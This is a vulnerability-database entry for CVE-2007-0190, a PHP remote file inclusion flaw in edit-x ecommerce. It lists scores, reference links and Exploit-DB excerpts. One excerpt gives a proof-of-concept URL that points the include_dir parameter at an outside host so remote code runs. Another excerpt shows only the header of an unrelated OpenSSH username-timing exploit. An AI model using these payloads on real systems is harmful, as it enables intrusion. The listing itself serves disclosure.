CVE-2007-0190
published 2007-01-12CVE-2007-0190: PHP remote file inclusion vulnerability in edit_address.php in edit-x ecommerce allows remote attackers to execute arbitrary PHP code via a URL in the…
PriorityP343high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.61%
83.5th percentile
PHP remote file inclusion vulnerability in edit_address.php in edit-x ecommerce allows remote attackers to execute arbitrary PHP code via a URL in the include_dir parameter.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Portable OpenSSH 3.6.1p-PAM/4.1-SuSE - Timing Attack
exploitdb·2007-02-13·CVSS 5.0
CVE-2006-5229 [MEDIUM] Portable OpenSSH 3.6.1p-PAM/4.1-SuSE - Timing Attack
Portable OpenSSH 3.6.1p-PAM/4.1-SuSE - Timing Attack
---
#!/bin/bash
#
# $Id: raptor_sshtime,v 1.1 2007/02/13 16:38:57 raptor Exp $
#
# raptor_sshtime - [Open]SSH remote timing attack exploit
# Copyright (c) 2006 Marco Ivaldi
#
# OpenSSH-portable 3.6.1p1 and earlier with PAM support enabled immediately
# sends an error message when a user does not exist, which allows remote
# attackers to determine valid usernames via a timing attack (CVE-2003-0190).
#
# OpenSSH portable 4.1 on SUSE Linux, and possibly other platforms and versions,
# and possibly under limited configurations, allows remote attackers to
# determine valid usernames via timing discrepancies in which responses take
# longer for valid usernames than invalid ones, as demonstrated by sshtime.
# NOTE: as of 20061014, it appears
Exploit-DB
Edit-X - 'Edit_Address.php' Remote File Inclusion
exploitdb·2007-01-09
CVE-2007-0190 Edit-X - 'Edit_Address.php' Remote File Inclusion
Edit-X - 'Edit_Address.php' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/21974/info
Edit-x is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/[editxPATH]/editx/edit_address.php?include_dir=HTTP://www.example2.com
No writeups or analysis indexed.
http://securityreason.com/securityalert/2139http://www.securityfocus.com/archive/1/456439/100/0/threadedhttp://www.securityfocus.com/bid/21974http://www.vupen.com/english/advisories/2007/0158https://exchange.xforce.ibmcloud.com/vulnerabilities/31384http://securityreason.com/securityalert/2139http://www.securityfocus.com/archive/1/456439/100/0/threadedhttp://www.securityfocus.com/bid/21974http://www.vupen.com/english/advisories/2007/0158https://exchange.xforce.ibmcloud.com/vulnerabilities/31384
2007-01-12
Published